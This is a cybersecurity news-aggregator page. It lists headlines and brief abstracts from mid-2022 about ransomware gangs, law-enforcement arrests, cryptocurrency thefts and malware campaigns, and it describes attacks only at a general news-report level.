Abstract A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT). "This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past," Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar  said  in a Tuesday write-up. Sold on the dark web for €189 a month,  Quantum Builder  is a customizable tool for generating malicious shortcut files as well as HTA, ISO, and PowerShell payloads to deliver next-stage malware on the targeted machines, in this case  Agent Tesla . The multi-stage attack chain starts with a spear-phishing containing a GZIP archive attachment that includes a shortcut designed to execute PowerShell code responsible for launching a remote HTML application (HTA) using  MSHTA . The phishing emails purport to be an order confirmation message from a Chinese supplier of lump and rock sugar, with the LNK file masquerading as a

The Hacker News

September 27, 2022

How Underground Groups Use Stolen Identities and Deepfakes Full Text

Abstract The growing appearance of deepfake attacks is significantly reshaping the threat landscape for organizations, financial institutions, celebrities, political figures, and even ordinary people.

Trend Micro

September 26, 2022

BlackCat Ransomware Attackers Spotted Fine-Tuning Their Malware Arsenal Full Text

Abstract The  BlackCat ransomware crew  has been spotted fine-tuning their malware arsenal to fly under the radar and expand their reach. "Among some of the more notable developments has been the use of a new version of the Exmatter data exfiltration tool, and the use of Eamfo, information-stealing malware that is designed to steal credentials stored by Veeam backup software," researchers from Symantec  said  in a new report. BlackCat, also known by the names ALPHV and Noberus, is attributed to an adversary tracked as Coreid (aka  FIN7 , Carbanak, or Carbon Spider) and is said to be a  rebranded successor  of  DarkSide  and  BlackMatter , both of which shut shop last year following a string of high-profile attacks, including that of Colonial Pipeline. The threat actor, like other notorious ransomware groups, is known to run a ransomware-as-a-service (RaaS) operation, which involves its core developers enlisting the help of affiliates to carry out the attacks in exchange for a cut

The Hacker News

September 26, 2022

Ukraine Arrests Cybercrime Group for Selling Data of 30 Million Accounts Full Text

Abstract Ukrainian law enforcement authorities on Friday disclosed that it had "neutralized" a hacking group operating from the city of Lviv that it said acted on behalf of Russian interests. The group specialized in the sales of 30 million accounts belonging to citizens from Ukraine and the European Union on the dark web and netted a profit of $372,000 (14 million UAH) through electronic payment systems like YooMoney, Qiwi, and WebMoney that are outlawed in the country. "Their 'wholesale clients' were pro-kremlin propagandists," the Security Service of Ukraine (SSU)  said  in a press release. "It was them who used the received identification data of Ukrainian and foreign citizens to spread fake 'news' from the front and sow panic." The goal behind the campaign was "large-scale destabilization in multiple countries," it stated, adding the hacked accounts were used to propagate false information about the socio-political situation in U

The Hacker News

September 24, 2022

Ukraine: SSU dismantled cyber gang that stole 30 million accounts Full Text

Abstract The cyber department of Ukraine 's Security Service (SSU) dismantled a gang that stole accounts of about 30 million individuals. The cyber department of Ukraine 's Security Service (SSU) has taken down a group of hackers that is behind the theft of about...

Security Affairs

September 24, 2022

Colonial Pipeline ransomware group using new tactics to become more dangerous Full Text

Abstract Also known in some circles as FIN7 or Carbon Spider, Coreid is a ransomware-as-a-service (RaaS) operation that develops ransomware tools and services and then collects money from affiliates who use these tools to carry out the actual attacks.

Tech Republic

September 24, 2022

London Police Arrested 17-Year-Old Hacker Suspected of Uber and GTA 6 Breaches Full Text

Abstract The City of London Police on Friday revealed that it has arrested a 17-year-old teenager from Oxfordshire on suspicion of hacking. "On the evening of Thursday 22 September 2022, the City of London Police arrested a 17-year-old in Oxfordshire on suspicion of hacking," the agency  said , adding "he remains in police custody." The department said the arrest was made as part of an investigation in partnership with the U.K. National Crime Agency's cyber crime unit. No further details about the nature of the investigation were disclosed, although it's suspected that the law enforcement action may have something to do with the recent string of high-profile hacks aimed at  Uber  and  Rockstar Games . Both the intrusions are alleged to have been committed by the same threat actor, who goes by the name Tea Pot (aka teapotuberhacker). Uber, for its part, has pinned the breach on an attacker (or attackers) that it believes is associated with the LAPSUS$ extortion

The Hacker News

September 23, 2022

Ukraine dismantles hacker gang that stole 30 million accounts Full Text

Abstract The cyber department of Ukraine's Security Service (SSU) has taken down a group of hackers that stole accounts of about 30 million individuals and sold them on the dark web.

BleepingComputer

September 23, 2022

Multi-million dollar credit card fraud operation uncovered Full Text

Abstract A massive operation that has reportedly siphoned millions of USD from credit cards since its launch in 2019 has been exposed and is considered responsible for losses for tens of thousands of victims.

BleepingComputer

September 21, 2022

Domain shadowing becoming more popular among cybercriminals Full Text

Abstract Threat analysts at Palo Alto Networks (Unit 42) discovered that the phenomenon of 'domain shadowing' might be more prevalent than previously thought, uncovering 12,197 cases while scanning the web between April and June 2022.

BleepingComputer

September 21, 2022

Hackers stole $160 Million from Crypto market maker Wintermute Full Text

Abstract Threat actors have stolen around $160 million worth of digital assets worth from crypto trading firm Wintermute. Malicious actors continue to target organizations in the cryptocurrency industry, the last victim in order of time is crypto trading...

Security Affairs

September 19, 2022

TeamTNT is back and targets servers to run Bitcoin encryption solvers Full Text

Abstract AquaSec researchers observed the cybercrime gang TeamTNT hijacking servers to run Bitcoin solver since early September. In the first week of September, AquaSec researchers identified at least three different attacks targeting their honeypots, the experts...

Security Affairs

September 19, 2022

Update: ‘Vindictive’ couple behind IHG hack deleted hotel chain data for fun Full Text

Abstract Describing themselves as a couple from Vietnam, they say they first tried a ransomware attack, then deleted large amounts of data when they were foiled. An expert says the case highlights the vindictive side of criminal hackers.

BBC

September 16, 2022

Hacker sells stolen Starbucks data of 219,000 Singapore customers Full Text

Abstract The Singapore division of Starbucks, the popular American coffeehouse chain, has admitted that it suffered a data breach incident impacting over 219,000 of its customers.

BleepingComputer

September 12, 2022

Triple Extortion Ransomware: A New Trend Among Cybercriminals Full Text

Abstract In addition to data encryption (the first layer), and the threat of leaking important data (the second layer), the cybercriminal can add another tactic of his choosing (the third layer).

Heimdal Security

September 10, 2022

Ransomware gangs switching to new intermittent encryption tactic Full Text

Abstract A growing number of ransomware groups are adopting a new tactic that helps them encrypt their victims' systems faster while reducing the chances of being detected and stopped.

BleepingComputer

September 09, 2022

U.S. Seizes Cryptocurrency Worth $30 Million Stolen by North Korean Hackers Full Text

Abstract More than $30 million worth of cryptocurrency plundered by the North Korea-linked Lazarus Group from online video game Axie Infinity has been recovered, marking the first time digital assets stolen by the threat actor have been seized. "The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized), and demonstrate that it is becoming more difficult for bad actors to successfully cash out their ill-gotten crypto gains," Erin Plante, senior director of investigations at Chainalysis,  said . The development arrives more than five months after the  crypto hack  resulted in the theft of $620 million from the decentralized finance (DeFi) platform Ronin Network, with the attackers laundering a majority of the proceeds – amounting to $455 million – through the Ethereum-based cryptocurrency tumbler Tornado Cash. The March 2022 cryptocurrency heist resulted in losses totaling 173,600 ETH wort

The Hacker News

September 8, 2022

Ex-members of the Conti ransomware gang target Ukraine Full Text

Abstract Some members of the Conti ransomware gang were involved in financially motivated attacks targeting Ukraine from April to August 2022. Researchers from Google's Threat Analysis Group (TAG) reported that some former members of the Conti cybercrime group...

Security Affairs

September 07, 2022

Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks Full Text

Abstract Former members of the Conti cybercrime cartel have been implicated in five different campaigns targeting Ukraine from April to August 2022. The findings, which come from Google's Threat Analysis Group (TAG), builds upon a  prior report  published in July 2022, detailing the continued cyber activity aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war. "UAC-0098 is a threat actor that historically delivered the  IcedID banking trojan , leading to human-operated ransomware attacks," TAG researcher Pierre-Marc Bureau  said  in a report shared with The Hacker News. "The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations." UAC-0098 is believed to have functioned as an initial access broker for ransomware groups such as Quantum and  Conti  (aka FIN12, Gold Ulrick, or Wizard Spiker), the former of which was  subsumed by Conti  in Apri

The Hacker News

September 06, 2022

US seizes WT1SHOP market selling credit cards, credentials, and IDs Full Text

Abstract An international law enforcement operation has seized the website and domains for WT1SHOP, a criminal marketplace that sold stolen credit cards, I.D. cards, and millions of login credentials.

BleepingComputer

September 6, 2022

Russian-speaking cyber criminals feel economic pinch Full Text

Abstract Russian-speaking cybercriminals face falling financial returns following Russia’s invasion of Ukraine, with many scams becoming redundant almost overnight due to sanctions and increased scrutiny of Russian entities, say Digital Shadows researchers.

Computer Weekly

September 6, 2022

Interpol dismantled sextortion ring in Asia Full Text

Abstract Interpol arrested 12 individuals which are suspected to be core members of a transnational sextortion ring. Interpol announced the arrest of 12 individuals suspected to be core members of a transnational sextortion ring. The arrests took place in July...

Security Affairs

September 05, 2022

Interpol dismantles sextortion ring, warns of increased attacks Full Text

Abstract A transnational sextortion ring was uncovered and dismantled following a joint investigation between Interpol's cybercrime division and police in Singapore and Hong Kong.

BleepingComputer

September 05, 2022

Ransomware Attackers Abuse Genshin Impact Anti-Cheat System to Disable Antivirus Full Text

Abstract A vulnerable anti-cheat driver for the Genshin Impact video game has been leveraged by a cybercrime actor to disable antivirus programs to facilitate the deployment of ransomware, according to findings from Trend Micro. The ransomware infection, which was triggered in the last week of July 2022, banked on the fact that the driver in question ("mhyprot2.sys") is signed with a valid certificate, thereby making it possible to circumvent privileges and terminate services associated with endpoint protection applications. Genshin Impact is a popular action role-playing game that was developed and published by Shanghai-based developer miHoYo in September 2020. The driver used in the attack chain is said to have been built in August 2020, with the existence of the flaw in the module  discussed  after the release of the game, and leading to  exploits   demonstrating  the ability to kill any arbitrary process and escalate to kernel mode. The idea, in a nutshell, is to use the leg

The Hacker News

September 2, 2022

Experts link Raspberry Robin Malware to Evil Corp cybercrime gang Full Text

Abstract Researchers attribute the Raspberry Robin malware to the Russian cybercrime group known as Evil Corp group. IBM Security X-Force researchers discovered similarities between a component used in the Raspberry Robin malware and a Dridex malware loader,...

Security Affairs

September 2, 2022

Terrorists relying on cybercrime for funding since Covid-19: APG Report Full Text

Abstract Terrorist groups are increasingly relying on criminal activities, including cybercrime and online frauds, scams to finance their illicit activities, according to the annual report of Asia Pacific Group on Money Laundering.

The Times Of India

September 02, 2022

San Francisco 49ers: Blackbyte ransomware gang stole info of 20K people Full Text

Abstract NFL's San Francisco 49ers are mailing notification letters confirming a data breach affecting more than 20,000 individuals following a ransomware attack that hit its network earlier this year.

BleepingComputer

September 1, 2022

Ragnar Locker ransomware gang claims to have stolen data from TAP Air Portugal Full Text

Abstract The Ragnar Locker ransomware gang claims to have hacked the Portuguese state-owned flag carrier airline TAP Air Portugal and stolen customers' data. The Ragnar Locker ransomware added the Portuguese state-owned flag carrier airline TAP Air Portugal...

Security Affairs

August 31, 2022

Cybercriminals Released Mini Stealer’s Builder & Panel for Free Full Text

Abstract There is a lot of stuff that MiniStealer targets, but it mostly targets FTP applications and browsers that are based on Chromium. Threat actors claim that their stealer can target different OS, including Windows 7, Windows 10, and Windows 11.

GB Hackers

August 30, 2022

Ukraine takes down cybercrime group hitting crypto fraud victims Full Text

Abstract The National Police of Ukraine (NPU) took down a network of call centers used by a cybercrime group focused on financial scams and targeting victims of cryptocurrency scams under the guise of helping them recover their stolen funds.

BleepingComputer

August 30, 2022

Crooks are increasingly targeting DeFi platforms to steal cryptocurrency Full Text

Abstract The U.S. FBI warns investors that crooks are increasingly exploiting security issues in Decentralized Finance (DeFi) platforms to steal cryptocurrency. The U.S. Federal Bureau of Investigation (FBI) published a Public Service Announcement (PSA) to warn...

Security Affairs

August 26, 2022

Attackers Stole Crypto from Bitcoin ATMs Full Text

Abstract Hackers abused a zero-day vulnerability in General Bytes Bitcoin ATM servers, allowing them to hijack transactions related to fund withdrawal and deposits. It's not known how many servers were attacked using the flaw and how much cryptocurrency was stolen. The ATM maker has provided steps to perfor ... Read More

Cyware Alerts - Hacker News

August 26, 2022

Cybercrime Groups Increasingly Adopting Sliver Command-and-Control Framework Full Text

Abstract Nation-state threat actors are  increasingly adopting  and integrating the Sliver command-and-control (C2) framework in their intrusion campaigns as a replacement for Cobalt Strike. "Given Cobalt Strike's popularity as an attack tool, defenses against it have also improved over time," Microsoft security experts  said . "Sliver thus presents an attractive alternative for actors looking for a lesser-known toolset with a low barrier for entry." Sliver, first made public in late 2019 by cybersecurity company BishopFox, is a Go-based  open source C2 platform  that supports user-developed extensions, custom implant generation, and other commandeering options. "A C2 framework usually includes a server that accepts connections from implants on a compromised system, and a client application that allows the C2 operators to interact with the implants and launch malicious commands," Microsoft said. Besides facilitating long-term access to infected hosts, the cross-platform kit is also known

The Hacker News

August 24, 2022

True crime shows might be the biggest educational tool for cybercrime awareness Full Text

Abstract Popular cultural depictions of fraud and cybercrime are raising awareness of the dangers posed to personally identifiable information by bad actors, according to a new study.

CSO Online

August 23, 2022

New ‘Donut Leaks’ extortion gang linked to recent ransomware attacks Full Text

Abstract A new data extortion group named 'Donut Leaks' is linked to recent cyberattacks, including those on Greek natural gas company DESFA, UK architectural firm Sheppard Robson, and multinational construction company Sando.

BleepingComputer

August 21, 2022

Hackers Stole Crypto from Bitcoin ATMs by Exploiting Zero-Day Vulnerability Full Text

Abstract Bitcoin ATM manufacturer General Bytes confirmed that it was a victim of a cyberattack that exploited a previously unknown flaw in its software to plunder cryptocurrency from its users. "The attacker was able to create an admin user remotely via CAS administrative interface via a URL call on the page that is used for the default installation on the server and creating the first administration user," the company  said  in an advisory last week. "This vulnerability has been present in CAS software since version 2020-12-08." It's not immediately clear how many servers were breached using this flaw and how much cryptocurrency was stolen. CAS is short for  Crypto Application Server , a self-hosted product from General Bytes that enables companies to manage Bitcoin ATM ( BATM ) machines from a central location via a web browser on a desktop or a mobile device. The zero-day flaw, which concerned a bug in the CAS admin interface, has been mitigated in two server p

The Hacker News

August 21, 2022

Threat actors are stealing funds from General Bytes Bitcoin ATM Full Text

Abstract Threat actors have exploited a zero-day vulnerability in the General Bytes Bitcoin ATM servers to steal BTC from multiple customers. Threat actors have exploited a zero-day flaw in General Bytes Bitcoin ATM servers that allowed them to hijack transactions...

Security Affairs

August 20, 2022

TA558 cybercrime group targets hospitality and travel orgs Full Text

Abstract TA558 cybercrime group is behind a malware campaign targeting hospitality, hotel, and travel organizations in Latin America Researchers from Proofpoint are monitoring a malware campaign conducted by a cybercrime group, tracked as TA558, that is targeting...

Security Affairs

August 20, 2022

Crypto hackers have stolen nearly $2 billion this year—Here’s why it’s a growing problem Full Text

Abstract As per a report by Chainalysis, cybercriminals have already stolen nearly $2 billion worth of cryptocurrency in 2022 which is a spike of nearly 60% compared to a year ago.

CNBC

August 19, 2022

Cybercrime Group TA558 Targeting Hospitality, Hotel, and Travel Organizations Full Text

Abstract A financially motivated cybercrime group has been linked to an ongoing wave of attacks aimed at hospitality, hotel, and travel organizations in Latin America with the goal of installing malware on compromised systems. Enterprise security firm Proofpoint, which is tracking the group under the name TA558 dating all the way back to April 2018, called it a "small crime threat actor." "Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT," the company's threat research team  said  in a new report. The group has been operational at a higher tempo in 2022 than usual, with intrusions mainly geared towards Portuguese and Spanish speakers in Latin America, and to a lesser extent in Western Europe and North America. Phishing campaigns mounted by the group involve sending malicious spam messages with reservation-themed lures such as hotel bookings that cont

The Hacker News

August 18, 2022

Fugitive Arrested After 3 Years on Charges Related to BEC Scheme Full Text

Abstract Using the illegally obtained personal information, conspirators would obtain counterfeit checks on behalf of their victims, along with details on the victims’ bank accounts.

Security Week

August 17, 2022

Cybercriminals Developing BugDrop Malware to Bypass Android Security Features Full Text

Abstract In a sign that malicious actors continue to find ways to work around Google Play Store security protections, researchers have spotted a previously undocumented Android dropper trojan that's currently in development. "This new malware tries to abuse devices using a novel technique, not seen before in Android malware, to spread the extremely dangerous  Xenomorph  banking trojan, allowing criminals to perform On-Device Fraud on victim's devices," ThreatFabric's Han Sahin said in a statement shared with The Hacker News. Dubbed  BugDrop  by the Dutch security firm, the  dropper app  is explicitly designed to defeat new features introduced in the upcoming version of Android that aim to make it difficult for malware to request Accessibility Services privileges from victims. ThreatFabric attributed the dropper to a cybercriminal group known as "Hadoken Security," which is also behind the creation and distribution of the  Xenomorph and Gymdrop  Android malwa

The Hacker News

August 17, 2022

BlackByte ransomware gang is back with new extortion tactics Full Text

Abstract The BlackByte ransomware is back with version 2.0 of their operation, including a new data leak site utilizing new extortion techniques borrowed from LockBit.

BleepingComputer

August 16, 2022

Clop gang targeted UK drinking water supplier South Staffordshire Water Full Text

Abstract A cyber attack disrupted the IT operations of South Staffordshire Water, a company supplying drinking water to 1.6M consumers daily. South Staffordshire Water has issued a statement confirming the security breach, the company pointed out that the attack...

Security Affairs

August 15, 2022

Ransomware Groups Refine Shakedown and Monetization Models Full Text

Abstract Ransomware-wielding attackers continue to seek new ways to maximize profits with minimal effort. Some of their top tactics include tapping initial access brokers, working with botnet operators and testing new monetization models.

Bank Info Security

August 13, 2022

US unmasks alleged Conti ransomware operative, offers $10M Full Text

Abstract The U.S. government said it will offer up to $10 million for information related to five people believed to be high-ranking members of the notorious Russia-backed Conti ransomware gang.

Tech Crunch

August 12, 2022

The US offers a $10M rewards for info on the Conti ransomware gang’s members Full Text

Abstract The U.S. State Department announced a $10 million reward for information related to five individuals associated with the Conti ransomware gang. The U.S. State Department announced a $10 million reward for information on five prominent members of the Conti...

Security Affairs

August 12, 2022

U.S. Government Offers $10 Million Reward for Information on Conti Ransomware Gang Full Text

Abstract The U.S. State Department on Thursday  announced  a $10 million reward for information related to five individuals associated with the Conti ransomware group. The reward offer, first  reported  by WIRED, is also notable for the fact that it marks the first time the face of a Conti associate, known as "Target," has been unmasked. The four other associates have been referred to as "Tramp," "Dandis," "Professor," and "Reshaev." The government, besides seeking information about the five operators that could lead to their identification or location, is also calling on people to share details about Conti and its affiliated groups  TrickBot  and  Wizard Spider . Since its rebrand from Ryuk to Conti, the transnational organized crime group has been linked to hundreds of ransomware incidents over the past two years. As of January 2022, the Russia-based ransomware-as-a-service (RaaS) operation is estimated to have hit over 1,000 entities, w

The Hacker News

August 12, 2022

Alleged Business Email Compromise Fraudsters Extradited Full Text

Abstract Three Nigerian nationals accused of participating in multimillion-dollar business email compromise fraud with a fixation on universities arrived in the United States after extradition from the United Kingdom.

Bank Info Security

August 11, 2022

US govt will pay you $10 million for info on Conti ransomware members Full Text

Abstract The U.S. State Department announced a $10 million reward today for information on five high-ranking Conti ransomware members, including showing the face of one of the members for the first time.

BleepingComputer

August 11, 2022

Conti Cybercrime Cartel Using ‘BazarCall’ Phishing Attacks as Initial Attack Vector Full Text

Abstract A trio of offshoots from the notorious Conti cybercrime cartel have resorted to the technique of call-back phishing as an initial access vector to breach targeted networks. "Three autonomous threat groups have since adopted and independently developed their own targeted phishing tactics derived from the call back phishing methodology," cybersecurity firm AdvIntel  said  in a Wednesday report. These targeted campaigns "substantially increased" attacks against entities in finance, technology, legal, and insurance sectors, the company added. The actors in question include Silent Ransom, Quantum, and Roy/Zeon, all of which split from Conti after the ransomware-as-a-service (RaaS) cartel  orchestrated its shutdown  in May 2022 following its public support for Russia in the ongoing Russo-Ukrainian conflict. The advanced social engineering tactic, also called  BazaCall  (aka BazarCall), came under the spotlight in 2020/2021 when it was put to use by operators of the

The Hacker News

August 10, 2022

Ransomware gangs move to ‘callback’ social engineering attacks Full Text

Abstract At least three groups split from the Conti ransomware operation have adopted BazarCall phishing tactics as the primary method to gain initial access to a victim's network.

BleepingComputer

August 10, 2022

New dark web markets claim association with criminal cartels Full Text

Abstract Several new marketplaces have appeared on the dark web, claiming to be the dedicated online portals for notorious criminal cartels from Mexico.

BleepingComputer

August 10, 2022

Conti extortion gangs behind surge of BazarCall phishing attacks Full Text

Abstract At least three groups split from the Conti ransomware operation have adopted BazarCall phishing tactics as the primary method to gain initial access to a victim's network.

BleepingComputer

August 09, 2022

How hackers are stealing credit cards from classifieds sites Full Text

Abstract A new credit card stealing campaign is underway in Singapore, snatching the payment details of sellers on classifieds sites through an elaborate phishing trick.

BleepingComputer

August 9, 2022

Morocco court in favour of extraditing French cybercrime suspect to US Full Text

Abstract French magazine L'Obs reported that the FBI suspects Raoult of belonging to the ShinyHunters hacking group, which has allegedly targeted US companies including Microsoft.

France24

August 09, 2022

Maui ransomware operation linked to North Korean ‘Andariel’ hackers Full Text

Abstract The Maui ransomware operation has been linked to the North Korean state-sponsored hacking group 'Andariel,' known for using malicious cyber activities to generate revenue and causing discord in South Korea.

BleepingComputer

August 04, 2022

Hackers try to extort survey firm QuestionPro after alleged data theft Full Text

Abstract Hackers attempted to extort the online survey platform QuestionPro after claiming to have stolen the company's database containing respondents' personal information.

BleepingComputer

August 4, 2022

Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware Full Text

Abstract Among the threat actors distributing Bumblebee is Projector Libra (aka EXOTIC LILY). It is a criminal group that uses file sharing services to distribute malware after direct email correspondence with a potential victim.

Palo Alto Networks

August 2, 2022

Hackers Stole Passwords for Accessing 140,000 Payment Terminals Full Text

Abstract Hackers had access to dashboards used to remotely manage and control thousands of credit card payment terminals manufactured by digital payments giant Wiseasy, a cybersecurity startup told TechCrunch.

Tech Crunch

August 2, 2022

LockBit 3.0 affiliate sideloads Cobalt Strike through Windows Defender Full Text

Abstract An affiliate of the LockBit 3.0 RaaS operation has been abusing the Windows Defender command-line tool to deploy Cobalt Strike payloads. During a recent investigation, SentinelOne researchers observed threat actors associated with the LockBit 3.0 ransomware-as-a-service...

Security Affairs

August 1, 2022

ALPHV/BlackCat ransomware gang claims to have stolen data from Creos Luxembourg S.A. Full Text

Abstract The ALPHV/BlackCat ransomware gang claims to have breached the European gas pipeline Creos Luxembourg S.A. The ALPHV/BlackCat ransomware gang claims to have hacked the European gas pipeline Creos Luxembourg S.A. Creos Luxembourg S.A. owns and manages...

Security Affairs

July 31, 2022

Australian Hacker Charged with Creating, Selling Spyware to Cyber Criminals Full Text

Abstract A 24-year-old Australian national has been charged for his purported role in the creation and sale of spyware for use by domestic violence perpetrators and child sex offenders. Jacob Wayne John Keen, who currently resides at Frankston, Melbourne, is said to have created the remote access trojan (RAT) when he was 15, while also administering the tool from 2013 until its shutdown in 2019 as part of a coordinated Europol-led exercise. "The Frankston man engaged with a network of individuals and sold the spyware, named Imminent Monitor (IM), to more than 14,500 individuals across 128 countries," the Australian Federal Police (AFP)  alleged  in a press release over the weekend. The defendant has been slapped with six counts of committing a computer offense by developing and supplying the malware, in addition to profiting off its illegal sale. Another woman, aged 42, who lives in the same home as the accused and is identified as his mother by  The Guardian , has also been c

The Hacker News

July 29, 2022

Microsoft experts linked the Raspberry Robin malware to Evil Corp operation Full Text

Abstract The malware uses cmd.exe to read and execute a file stored on the infected external drive, it leverages msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file.

Security Affairs

July 29, 2022

Spanish Police Arrest 2 Nuclear Power Workers for Cyberattacking the Radiation Alert System Full Text

Abstract Spanish law enforcement officials have announced the arrest of two individuals in connection with a cyberattack on the country's radioactivity alert network (RAR), which took place between March and June 2021. The act of sabotage is said to have disabled more than one-third of the sensors that are maintained by the Directorate-General for Civil Protection and Emergencies ( DGPCE ) and used to monitor excessive radiation levels across the country. The reason for the attacks is unknown as yet. "The two detainees, former workers, attacked the computer system and caused the connection of the sensors to fail, reducing their detection capacity even in the environment of nuclear power plants," the Policía Nacional  said . The law enforcement probe, dubbed Operation GAMMA, commenced in June 2021 in the aftermath of an attack perpetrated against the RAR network, which is a mesh of 800 gamma radiation detection sensors deployed in various parts of the country to detect surges

The Hacker News

July 28, 2022

Spain police arrested two men accused of cyber attacks on radioactivity alert network (RAR) Full Text

Abstract The Spanish police arrested two individuals accused to have hacked the country's radioactivity alert network (RAR) in 2021. The Spanish police have arrested two men suspected to be the hackers behind cyberattacks that hit the country's radioactivity...

Security Affairs

July 27, 2022

Spain arrests suspected hackers who sabotaged radiation alert system Full Text

Abstract The Spanish police have announced the arrest of two hackers believed to be responsible for cyberattacks on the country's radioactivity alert network (RAR), which took place between March and June 2021.

BleepingComputer

July 26, 2022

U.S. doubles reward for tips on North Korean-backed hackers Full Text

Abstract The U.S. State Department has increased rewards paid to anyone providing information on any North Korean-sponsored threat groups' members to $10 million.

BleepingComputer

July 25, 2022

Magecart Hacks Food Ordering Systems to Steal Payment Data from Over 300 Restaurants Full Text

Abstract Three restaurant ordering platforms MenuDrive, Harbortouch, and InTouchPOS were the target of two Magecart skimming campaigns that resulted in the compromise of at least 311 restaurants. The trio of breaches has led to the theft of more than 50,000 payment card records from these infected restaurants and posted for sale on the dark web. "The online ordering platforms MenuDrive and Harbortouch were targeted by the same Magecart campaign, resulting in e-skimmer infections on 80 restaurants using MenuDrive and 74 using Harbortouch," cybersecurity firm Recorded Future  revealed  in a report. "InTouchPOS was targeted by a separate, unrelated Magecart campaign, resulting in e-skimmer infections on 157 restaurants using the platform." Magecart actors have a history of  infecting e-commerce websites  with JavaScript skimmers to steal online shoppers' payment card data, billing information, and other personally identifiable information (PII). The first set of act

The Hacker News

July 25, 2022

LockBit Ransomware Gang Claims to Have Breached the Italian Revenue Agency Full Text

Abstract The ransomware gang LockBit claims to have hacked the Italian Revenue Agency (Agenzia delle Entrate) and added the government agency to the list of victims reported on its dark web leak site.

Security Affairs

July 22, 2022

Hacker selling Twitter account data of 5.4 million users for $30k Full Text

Abstract Twitter has suffered a data breach after threat actors used a vulnerability to build a database of phone numbers and email addresses belonging to 5.4 million accounts, with the data now up for sale on a hacker forum for $30,000. 

BleepingComputer

July 21, 2022

FBI Seizes $500,000 Ransomware Payments and Crypto from North Korean Hackers Full Text

Abstract The U.S. Department of Justice (DoJ) has announced the seizure of $500,000 worth of Bitcoin from North Korean hackers who extorted digital payments from several organizations by using a new ransomware strain known as Maui. "The seized funds include ransoms paid by healthcare providers in Kansas and Colorado," the DoJ  said  in a press release issued Tuesday. The recovery of the bitcoin ransoms comes after the agency said it took control of two cryptocurrency accounts that were used to receive payments to the tune of $100,000 and $120,000 from the medical centers. The DoJ did not disclose where the rest of the payments originated from. "Reporting cyber incidents to law enforcement and cooperating with investigations not only protects the United States, it is also good business," said Assistant Attorney General Matthew G. Olsen of the DoJ's National Security Division. "The reimbursement to these victims of the ransom shows why it pays to work with law en

The Hacker News

July 20, 2022

Conti’s Reign of Chaos: Costa Rica in the Crosshairs Full Text

Abstract Aamir Lakhani, with FortiGuard Labs, answers the question; Why is the Conti ransomware gang targeting people and businesses in Costa Rica?

Threatpost

July 19, 2022

Extortionists target restaurants, demand money to take down bad reviews Full Text

Abstract The possibility has always existed to leave poor reviews on Google Maps and elsewhere. However, seeing fraudsters get organized and issue extortion threats alongside the review is a new development.

Malwarebytes Labs

July 18, 2022

Ransom Extortion Without Ransomware Full Text

Abstract The Luna Moth or Silent Ransom gang has been breaching organizations to filch sensitive information, threatening victims with making the files publicly available unless a ransom is paid.

Cyware Alerts - Hacker News

July 17, 2022

Crooks stole $375k from Premint NFT, it is one of the biggest NFT hacks ever Full Text

Abstract Threat actors hacked the popular NFT platform, Premint NFT and stole 314 NFTs. The popular NFT platform, Premint NFT, was hacked, the threat actors compromised its official website and stole 314 NFTs. According to the experts from blockchain security...

Security Affairs

July 15, 2022

Holy Ghost ransomware operation is linked to North Korea Full Text

Abstract Microsoft researchers linked the Holy Ghost ransomware (H0lyGh0st) operation to North Korea-linked threat actors. The Microsoft Threat Intelligence Center (MSTIC) researchers linked the activity of the Holy Ghost ransomware (H0lyGh0st) operation to a North...

Security Affairs

July 14, 2022

Holy Ghost ransomware operation linked to North Korean hackers Full Text

Abstract For more than a year, North Korean hackers have been running a ransomware operation called HolyGhost, attacking small businesses in various countries.

BleepingComputer

July 14, 2022

BlackCat Becomes Bolder, Demands $2.5 Million as Ransom Full Text

Abstract The gang has launched several high-profile attacks, including OilTanking GmbH in January and Swissport in February. Most recently, BlackCat targeted Florida International University and the University of North Carolina A&T.

Cyware Alerts - Hacker News

July 13, 2022

Qakbot operations continue to evolve to avoid detection Full Text

Abstract Experts warn that operators behind the Qakbot malware operation are improving their attack chain in an attempt to avoid detection. Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The malware...

Security Affairs

July 12, 2022

Luna Moth Group Ransoms Data Without Ransomware Using Remote Administration Tools Full Text

Abstract A little social engineering and commercially available remote administration tools (RATs) and other software are all the new Luna Moth ransom group has needed to infiltrate victims' systems and extort payments.

Dark Reading

July 11, 2022

Ransomware gang now lets you search their stolen data Full Text

Abstract Two ransomware gangs and a data extortion group have adopted a new strategy to force victim companies to pay threat actors to not leak stolen data.

BleepingComputer

July 11, 2022

Update: Hackers Used Fake LinkedIn Job Listing to Steal $625 Million from Axie Infinity Full Text

Abstract Earlier in March this year, Ronin Network (RON), a blockchain network underpinning the famous crypto game Axie Infinity and Axie DAO suffered the largest crypto hack against a decentralized finance network reported to date.

Hackread

July 10, 2022

Hackers Used Fake Job Offer to Hack and Steal $540 Million from Axie Infinity Full Text

Abstract The $540 million hack of Axie Infinity's  Ronin Bridge  in late March 2022 was the consequence of one of its former employees getting tricked by a fraudulent job offer on LinkedIn, it has emerged.  According to a report from  The Block  published last week citing two people familiar with the matter, a senior engineer at the company was duped into applying for a job at a non-existent company, causing the individual to download a fake offer document disguised as a PDF. "After what one source described as multiple rounds of interviews, a Sky Mavis engineer was offered a job with an extremely generous compensation package," the Block reported. The offer document subsequently acted as a conduit to deploy malware designed to breach Ronin's network, ultimately facilitating one of the crypto sector's biggest hacks to date. "Sky Mavis employees are under constant advanced spear-phishing attacks on various social channels and one employee was compromised," t

The Hacker News

July 8, 2022

As Cybercriminals Recycle Ransomware, They’re Getting Faster Full Text

Abstract The first samples of Nokoyawa ransomware found by FortiGuard researchers were gathered in February 2022 and contain significant coding similarities with Karma, a ransomware that can be traced back to Nemty via a long series of variants.

Security Week

July 8, 2022

Russian Cybercrime Trickbot Group is systematically attacking Ukraine Full Text

